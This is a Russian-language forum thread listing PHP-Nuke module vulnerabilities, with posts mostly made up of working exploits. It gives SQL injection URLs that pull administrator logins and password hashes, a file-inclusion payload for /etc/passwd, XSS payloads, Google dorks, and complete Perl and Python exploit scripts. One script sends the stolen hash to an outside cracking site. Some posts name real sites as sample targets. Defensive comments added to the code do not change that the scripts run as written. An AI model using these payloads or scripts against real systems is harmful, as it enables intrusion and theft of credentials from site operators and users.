Обзор уязвимостей PHP-Nuke
Decide | Дата: Среда, 14.11.2012, 11:28 | Сообщение # 16 |
| PHP-Nuke Module eGallery "pid" Remote SQL Injection
PoC: Код:
modules.php?name=eGallery&file=index&op=showpic&pi d=- 9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0, aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
PHP-Nuke Module "seminar" Local FIle Inclusion
PoC: Код:
modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../.. /etc/passwd
Google dork: Код:
inurl:"modules.php?name=seminar"
Decide | Дата: Среда, 14.11.2012, 11:28 | Сообщение # 17 |
| PHP-Nuke KutubiSitte "kid" SQL Injection
#!/usr/bin/perl
# PHP-Nuke KutubiSitte "kid" SQL Injection (forum post #17).
#
# Defender's summary: the h_op=hadisgoster handler of the KutubiSitte module
# interpolates the "kid" request parameter into a SELECT without casting it
# to an integer, so a UNION SELECT can read aid/pwd from nuke_authors.
# Application-side fix: intval() the parameter / use a prepared statement.
# Indicators for log review: MySQL inline comments ("/**/", URL-encoded as
# %2F%2A%2A%2F) used in place of whitespace in the query string, and the
# spoofed User-Agent "Checkbot/0.4 ".
#
# NOTE(review): the script runs without strict/warnings, so $host, $path,
# $user_id, $conn, $query_pwd, $return_pwd and %args are package globals.
# The request string below contains extraction damage (stray spaces in
# "0% 2C0" and "nuke_auth ors"); it is kept byte-for-byte, not repaired.
# Line layout is reconstructed from a single-line paste.
use Getopt::Std;
use LWP::UserAgent;

# Print the usage banner to STDOUT. Takes no arguments.
sub usg{ printf("
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- | PHP-NUKE KutubiSitte [kid] => SQL Injection | -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- ################################################## ##### # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 # ################################################## ##### <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-> #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:# #:-------------------------------------------------------:# :#| USAGE: |#: :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:# #:-------------------------------------------------------:# :#| EXAMPLE: |#: :#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:#
"); }

# Print "site not vulnerable" (Italian) and terminate the process.
sub problem{ print "\n\n[~] SITO NON VULNERABILE [~]\n\n"; exit(); }

# Send one GET built from $host.$path and print the first 32-character
# hex-looking token found in the response body, labelled with $user_id.
# Calls problem() (which exits) when the GET returns false or when no
# such token is present in the body.
sub exploitation{
    $conn = LWP::UserAgent -> new;
    $conn->agent('Checkbot/0.4 ');
    $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_auth ors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
    $return_pwd = $conn->get($query_pwd) || problem();
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
}

# Command line: -h host, -p path, -U user id. All three are required;
# when any is missing only the banner is printed.
getopts(":h:p:U:",\%args);
$host = $args{h} if (defined $args{h});
$path = $args{p} if (defined $args{p});
$user_id= $args{U}if (defined $args{U});
if (!defined $args{h} || !defined $args{p} || !defined $args{U}){ usg(); } else{ exploitation(); }
Decide | Дата: Среда, 14.11.2012, 11:28 | Сообщение # 18 |
| SQL Injection
Exploit: Код:
Code modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2 A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2 A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
Decide | Дата: Среда, 14.11.2012, 11:28 | Сообщение # 19 |
| SQL Injection
Vulnerable: Version 3.0
Exploit: Код:
Code http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd), 2/**/from/**/nuke_authors/*where%20admin%20-2
Decide | Дата: Среда, 14.11.2012, 11:29 | Сообщение # 20 |
| SQL Injection
Vulnerable: Module ZClassifieds
Exploit:
Код:
modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd, aid/**/from/**/nuke_authors/*where%20admin1/**
Decide | Дата: Среда, 14.11.2012, 11:29 | Сообщение # 21 |
| XSS
Vulnerable: eWeather module
Уязвимый код: в скрипте /modules/eWeather/index.php PHP код: Строка 35: $zipCode=$chart; Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
Переменная "chart" не фильтруется.
PoC: Код:
http://example.net/modules.php?name=eWeather&chart=[XSS]
Decide | Дата: Среда, 14.11.2012, 11:29 | Сообщение # 22 |
| SQL Injection
Vulnerable: PHP-Nuke Platinum 7.6.b.5
Vuln script: dynamic_titles.php
Exploit: Код:
#!/usr/bin/perl
#Inphex
#
# PHP-Nuke Platinum 7.6.b.5 (forum post #22): SQL injection through the
# Forums module "p" parameter as handled by includes/dynamic_titles.php.
#
# Defender's summary: the injected value is a single quote followed by a
# UNION SELECT, so the site is only exposed when magic_quotes_gpc is OFF
# (as the author notes below) and the parameter is not cast to an integer.
# Mitigation: intval() the "p" parameter / parameterised queries. The
# selected value is reflected inside the page <title>, which is the channel
# this script reads. Log indicator: "'union+select" inside the Forums "p"
# parameter.
#
# NOTE(review): no strict/warnings; every variable here is a package global.
# LWP::Simple, IO::Socket and Switch are loaded but not used by the code
# shown. Line layout is reconstructed from a single-line paste.
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
# Defaults. -h and -p have no default, so $host/$path stay undef unless given.
$column = "username";
$table = "nuke_users";
$uid = 2;
# Maps each command-line flag to the NAME of the global it sets.
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");
# Hand-rolled option parsing: for every argv element equal to a flag, the
# following element is assigned through a symbolic reference (${$v}) to the
# global named by the hash value. This only works because strict is off.
# $a is Perl's sort variable; using it as a counter is a style smell.
$a = 0;
foreach (@ARGV) {
    $a++;
    while (($k, $v) = each(%cm_n_)) {
        if ($_ eq $k) {
            ${$v} = $ARGV[$a];
        }
    }
}
# The "&getit(...)" call form bypasses the ($$) prototype declared below.
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");

# getit($url, $reg): GET $url, apply regex $reg to the body and, when it
# matches, split capture 1 on ">>", take the middle field, remove " Post "
# and print it as "$column:value". Prints nothing when there is no match.
sub getit($$) {
    $url = shift;
    $reg = shift;
    $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;
    if ($content=~m/$reg/) {
        ($f,$s,$l) = split(">>",$1);
        $s =~s/ Post //;
        print $column.":".$s."\n";
    }
}
© Inphex
Decide | Дата: Среда, 14.11.2012, 11:29 | Сообщение # 23 |
| PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability Код: ------------------------------------------------------------------------------- php-nuke modules EasyContent remote sql inj ------------------------------------------------------------------------------- found =xoron ------------------------------------------------------------------------------- modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/* modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* ------------------------------------------------------------------------------- Example: http://eurowards.org/content/
not: password and username in title! column number 1
not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma. işe yarar bug nasıl hit yapıyor görmek istiyorsanız
http://www.milw0rm.com/author/721
sadece bi bug 16000+ hit sadece milw0rm;)
Herzmn kral benimdir! ----------------------------------------------------------
Decide | Дата: Среда, 14.11.2012, 11:29 | Сообщение # 24 |
#!/usr/bin/python
# PHP-Nuke Gaestebuch Module SQL Injection Exploit
# Coded By Shahin Ramezany For Fun
# E-Mail : Admin@secuiran.com
#
# Forum post #24: "PHP-Nuke GaestebuchSQL Injection Exploit Code".
#
# Defender's summary: modules.php?name=gaestebuch_v22&func=edit uses the
# "id" parameter in a SELECT without integer casting, so a UNION ALL SELECT
# can place nuke_authors aid/pwd into the guestemail / guesttext form fields
# of the edit page, which this script scrapes with two regexes.
# Fix: intval() the id / prepared statement. Log indicator:
# "union+all+select" inside the gaestebuch_v22 "id" parameter.
#
# NOTE(review): the recovered hash is sent in clear text to a third-party
# lookup service (tmto.org), so running this script discloses the victim's
# credential hash to that site. Python 2 syntax (print statement,
# raw_input, urllib.urlopen, string.join). Indentation below is
# reconstructed from a single-line paste.
import string
import urllib
import sys
import re


def Secuiran():
    """Print the ASCII banner to stdout. No arguments, no return value."""
    print "\n"
    print "################################################## ###"
    print "# WwW.Secuiran.Com #"
    print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit #"
    print "# Coded By Shahin . Ramezany (Vampire) For Fun #"
    print "# Keep It Priv8 && Never Post In Public Forum's #"
    print "# E-Mail : Admin@Secuiran.com #"
    print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix #"
    print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's #"
    print "################################################## ###"
    print "\n"


#Call Banner
Secuiran()
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"
# Interactive input; Ctrl-C ends the program cleanly.
try:
    host=raw_input("\nTarget Host (with http) : ")
except KeyboardInterrupt:
    print "\n[-] Program Terminated"
    sys.exit()
print "\n[+] Output File: e.e: secuiran.txt"
try:
    secuiran=raw_input("\nOutput File: ")
except KeyboardInterrupt:
    print "\n[-] Program Terminated"
    sys.exit()
print "\n[+] Trying To Connect ...\n"
#SQL Injection URL
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors +where+radminsuper=1"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
# Column 4 of the UNION lands in the "guestemail" input's value attribute.
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall
found_users=findall_users(response)
#check found user length
if len(found_users)==0:
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
    sys.exit()
#Extract Admin Hash
# The same page is fetched a second time; column 5 lands in the textarea.
response = urllib.urlopen(sql_inject).read()
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
    sys.exit()
#Crack The Hash
# All matched hashes are concatenated into one string before the lookup.
md5 = string.join( found_hashs, '' )
print "[+] Trying To Crack The Hash ..."
# External request: the hash leaves the operator's machine here.
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5
result = urllib.urlopen(crack).read()
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall
if re.match(result,"MD5_1_result,"+md5+" - not found"):
    print "[-] Can Not Crack"
    #sys.exit()
found=cracked(result)
#Convert List To String
cracked_md5 = string.join( found, '' )
#Print All Info
Secuiran()
print "\n[+] Host : ",host
for i in range(len(found_users)):
    print "\n[+] Admin User : ",found_users[i]
    print "\n[+] Admin Hash : ",found_hashs[i]
if (cracked_md5 == "not"):
    print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"
else:
    print "\n[+] Hash Cracked Successfully : ",cracked_md5
#Save All Info In File
# "file" shadows the Python 2 builtin of the same name; the handle is only
# closed on the normal path.
file = open(secuiran, "w")
file.write("************************************************** WwW.Secuiran.Com********************************** ****************\n")
file.write("\n")
file.write("HOST :")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write(" ")
file.write("\n")
for i in range(len(found_users)):
    file.write(found_users[i])
    file.write(" ")
    file.write(found_hashs[i])
    file.write("\n")
file.write("\n")
if (cracked_md5 == "not"):
    file.write("\n")
    file.write("I Can't Crack Your Hash")
else:
    file.write("Cracked :")
    file.write(" ")
    file.write("\n")
    file.write(cracked_md5)
    file.write("\n")
file.write("************************************************** WwW.Secuiran.Com********************************** ****************\n")
file.close()
print "\n[+] Successfully, Writed To ",secuiran," File ."
Decide | Дата: Среда, 14.11.2012, 11:30 | Сообщение # 25 |
#!/usr/bin/python
# Forum post #25: "PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab".
#
# Defender's summary: Your_Account op=activate passes $check_num into a
# quoted SQL string without escaping (see the activate() excerpt in the
# string literal below). With magic_quotes_gpc = 0 a quote in check_num
# closes the literal; the author also relies on a NUL byte (%00) to get past
# the query-string checks. The script is a boolean blind injection: one
# request per candidate hex digit and position, distinguished by whether the
# page contains "New user verification number is invalid.".
# Mitigation: prepared statements / strict validation of check_num (and
# rejection of NUL bytes in request parameters). Log indicator: bursts of
# GETs to op=activate with a fixed username and "check_num=1%00'" followed
# by SUBSTRING/ASCII, roughly 0.5 s apart.
#
# NOTE(review): Python 2 syntax (print statement, httplib). Comment box
# layout and indentation below are reconstructed from a single-line paste.
#================================================= ============================== ==================#
# This is a Priv8 Exploit.                                                                         #
# Date: 23/02/2008 [dd,mm,yyyy]                                                                    #
#                                                                                                  #
#================================================= ============================== ==================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2                             #
# Response Analisys Method                                                                         #
#                                                                                                  #
# Vendor: http://www.phpnuke.org                                                                   #
# Severity: Highest                                                                                #
# Author: The:Paradox                                                                              #
#================================================= ============================== ==================#
# Server configuration requirments:                                                                #
# magic_quotes_gpc = 0                                                                             #
#================================================= ============================== ==================#
# Proud To Be Italian.                                                                             #
#================================================= ============================== ==================#
""" Related Codes: mainfile.php; line 89;
if (!ini_get('register_globals')) { @import_request_variables("GPC", ""); } /Your_Account/index.php; line 1700; switch($op) { // [..] case "activate": activate($username, $check_num); break; // [..] } /Your_Account/index.php; line 161:
function activate($username, $check_num) { global $db, $user_prefix, $module_name, $language, $prefix; $username = filter($username, "nohtml", 1); $past = time()-86400; $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past"); $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'"; echo $sql; $result = $db->sql_query($sql);
"""
#================================================= ============================== ==================#
# Proof Of Concept / Bug Explanation:                                                              #
#                                                                                                  #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.        #
# Byte null bypasses all query string check.                                                       #
#                                                                                                  #
#================================================= ============================== ==================#
# Google Dork=> Powered by PHPNuke                                                                 #
#================================================= ============================== ==================#
# Use this at your own risk. You are responsible for your own deeds.                               #
#================================================= ============================== ==================#
# Python Exploit Starts                                                                            #
#================================================= ============================== ==================#
import httplib, sys, time
print "\n#=============================================== ==========#"
print " PHPNuke <= 8.0 And Maybe Higher "
print " Blind Sql Injection Vulnerability Mq=0 "
print " Response Analisys Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0])
print " python %s www.host.com / Andrea " % (sys.argv[0])
print " "
print " "
print "#================================================= ========#\n"
# Three positional arguments are required: target host, path, username.
if len(sys.argv)<=3:
    sys.exit()
else:
    print "[.]Exploit Starting."
target = sys.argv[1]
path = sys.argv[2]
prefix = "nuke_"
port = "80"
# j: 1-based position inside the 32-character hash; h4sh: digits recovered so far.
j=1
h4sh = ""
md5tuple = []
# Candidate byte values: ASCII '0'-'9' and 'a'-'f', then a sentinel.
for k in range(48,58):
    md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103):
    md5tuple.append(k)
md5tuple.append('END')
# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#
print "[.]Blind Sql Injection Starts.\n\nHash:"
# Outer loop walks the 32 positions; the inner loop tries each candidate
# until the server's response changes. Reaching the sentinel means no
# candidate matched, which the script treats as failure.
while j <= 32:
    for i in md5tuple:
        if i == 'END':
            sys.exit('[-]Exploit Failed.\n')
        conn = httplib.HTTPConnection(target,port)
        conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd ," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
        response = conn.getresponse()
        time.sleep(0.5)
        if response.status == 404:
            sys.exit('[-]Error 404. Not Found.')
        # The "invalid number" message is the TRUE branch of the injected IF.
        if response.read().find("New user verification number is invalid.") != -1:
            sys.stdout.write(chr(i))
            sys.stdout.flush()
            h4sh += chr(i)
            j += 1
            break;
print "\n\n[+]All Done.\n-=Paradoxe=-"
Decide | Дата: Среда, 14.11.2012, 11:30 | Сообщение # 26 |
| Ковырял я когда-то PHP Nuke 8.0. Вот парочка багов:
[XSS] http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00 "><script>alert()</script>
[XSS] http://nuke/modules.php?name=Your_Account&op=logout POST: redirect=1%00"><script>alert()</script>
[SQL-Inj] (POC) http://nuke/admin.php POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
Decide | Дата: Среда, 14.11.2012, 11:30 | Сообщение # 27 |
| Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян
Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код
Exploit:
Для примера возьму сайт sat-port.info Регистрируемся, редактируем наш аккаунт: Код: http://sat-port.info/modules.php?name=Your_Account&op=edituser
в поле Любой Email пишем: Код: admin@admin.ru ',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*
Берем любую новость где разрешено оставлять комментарии, к примеру эту: Код: http://sat-port.info/modules.php?name=News&file=article&sid=554
жмем "Комментировать" и пишем комментарий любого содержания; в результате появится комментарий, содержащий логин:хэш администратора
Decide | Дата: Среда, 14.11.2012, 11:30 | Сообщение # 28 |
| myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability Code ################################################## ##########
SQL Injection vulnerability in myPHPNuke
By MustLive (http://websecurity.com.ua)
Detailed information: http://websecurity.com.ua/2398/
Description: There is SQL Injection vulnerability in printfeature.php in myPHPNuke.
SQL Injection:
http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,n ull,null%20from%20mpn_authors%20limit%200,1
With this query you will receive the login and password (hash) of the administrator.
Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In the latest version additional filters were added, so it is not vulnerable to this attack. But version 1.8.8_8rc2 is still vulnerable to SQL Injection, so a limited SQL Injection attack is possible (without using spaces and brackets).
################################################## ##########
# milw0rm.com [2008-09-02]
Decide | Дата: Среда, 14.11.2012, 11:31 | Сообщение # 29 |
| SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)
/modules/Reviews/index.php Фрагмент уязвимого кода:
/* Fragment of /modules/Reviews/index.php (PHP-Nuke <= 8.0), forum post #29.
 *
 * Defender's summary: $id and $score are cast with intval(), but $uname
 * (taken from $cookie[1] through filter(..., "nohtml")) and $comments are
 * interpolated directly into the SELECT and into both INSERT statements
 * below. filter()'s non-save path ends in stripslashes(), so quotes reach
 * the SQL string unescaped. Fix: escape after filtering, or better, use
 * prepared statements. No sanitisation of $comments is visible in this
 * fragment -- verify where it is assigned.
 * Line layout is reconstructed from a single-line paste.
 */
$uname = filter($cookie[1], "nohtml");
$id = intval($id);
$score = intval($score);
if (is_user($user)) {
    /* First injection point: $uname inside a quoted SQL literal. */
    $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
    if ($krow['karma'] == 2) {
        /* Second injection point: $uname and $comments in the moderated INSERT. */
        $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
        include("header.php");
        title(""._MODERATEDTITLE."");
        OpenTable();
        echo "<center>"._COMMENTMODERATED."";
        echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
        CloseTable();
        include("footer.php");
        die();
    } elseif ($krow['karma'] == 3) {
        Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
        die();
    }
}
/* Third injection point: the same interpolation in the unmoderated INSERT. */
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
Decide | Дата: Среда, 14.11.2012, 11:31 | Сообщение # 30 |
| Тут присутствуют сразу 2 sql-inj, в select и в insert запросах: после раскодировки кук происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter
/*
 * filter($what, $strip="", $save="", $type="")
 *
 * PHP-Nuke text-sanitising helper (forum post #30). Returns the processed
 * string.
 *   $what  - input text
 *   $strip - "nohtml" removes all HTML through check_html()
 *   $save  - 1 when the value is about to be stored (addslashes path)
 *   $type  - "preview" skips the html_entity_decode() step
 *
 * Defender's summary (why the Reviews fragment above is injectable): when
 * $save is not 1 the value goes through stripslashes(FixQuotes(...)), so
 * backslashes added earlier (e.g. by magic_quotes) are removed and quotes
 * come back unescaped; check_html() also calls stripslashes() on its own.
 * The return value is therefore NOT safe to interpolate into SQL. For
 * "nohtml" the html_entity_decode(..., ENT_QUOTES) after check_html()
 * additionally turns entity-encoded quotes back into raw characters.
 * Line layout is reconstructed from a single-line paste.
 */
function filter($what, $strip="", $save="", $type="") {
    if ($strip == "nohtml") {
        $what = check_html($what, $strip);
        // $what = htmlentities(trim($what), ENT_QUOTES);
        // If the variable $what doesn't comes from a preview screen should be converted
        if ($type != "preview" AND $save != 1) {
            $what = html_entity_decode($what, ENT_QUOTES);
        }
    }
    if ($save == 1) {
        $what = check_words($what);
        $what = check_html($what, $strip);
        // Escape only when magic_quotes has not already done so.
        if (!get_magic_quotes_gpc()) {
            $what = addslashes($what);
        }
    } else {
        // Display path: slashes are stripped and nothing is escaped.
        $what = stripslashes(FixQuotes($what,$strip));
        $what = check_words($what);
        $what = check_html($what, $strip);
    }
    return($what);
}
а оттуда в ф-цию check_html
/*
 * check_html($str, $strip="")
 *
 * HTML allow-list filter (forum post #30). Returns $str with every tag that
 * is not a key of $AllowableHTML (loaded from config.php) removed; with
 * $strip == "nohtml" the allow-list is emptied so every tag is dropped.
 *
 * Defender's notes:
 *  - stripslashes() is applied first, so escaping done by a caller is undone.
 *  - "return $str; exit;" makes the trailing "<?" squash unreachable, so
 *    PHP open tags are never removed by this function.
 *  - ereg()/eregi_replace()/ereg_replace() were removed in PHP 7; this code
 *    only runs on PHP 5 and earlier.
 *  - "if ($a = $AllowableHTML[$tag])" is an assignment used as a condition
 *    (its value is reused below as $a), not a comparison.
 * Line layout is reconstructed from a single-line paste.
 */
function check_html ($str, $strip="") {
    /* The core of this code has been lifted from phpslash */
    /* which is licenced under the GPL. */
    include("config.php");
    if ($strip == "nohtml")
        $AllowableHTML=array('');
    $str = stripslashes($str);
    $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str); // Delete all spaces from html tags .
    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str); // Delete all attribs from Anchor, except an href, double quoted.
    $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str); // Delete all img tags
    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str); // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
    $tmp = "";
    // Walk the tags left to right: copy the text before each one into $tmp,
    // then re-emit the tag (allowed) or drop it (not allowed).
    while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
        $i = strpos($str,$reg[0]);
        $l = strlen($reg[0]);
        if ($reg[1][0] == "/")
            $tag = strtolower(substr($reg[1],1));
        else
            $tag = strtolower($reg[1]);
        if ($a = $AllowableHTML[$tag])
            if ($reg[1][0] == "/")
                $tag = "</$tag>";
            elseif (($a == 1) || ($reg[2] == ""))
                $tag = "<$tag>";
            else {
                # Place here the double quote fix function.
                $attrb_list=delQuotes($reg[2]);
                // A VER  (Spanish: "to be checked")
                //$attrb_list = ereg_replace("&","&",$attrb_list);
                $tag = "<$tag" . $attrb_list . ">";
            } # Attribs in tag allowed
        else
            $tag = "";
        $tmp .= substr($str,0,$i) . $tag;
        $str = substr($str,$i+$l);
    }
    $str = $tmp . $str;
    return $str;
    exit;
    /* Squash PHP tags unconditionally */
    $str = ereg_replace("<\?","",$str);
    return $str;
}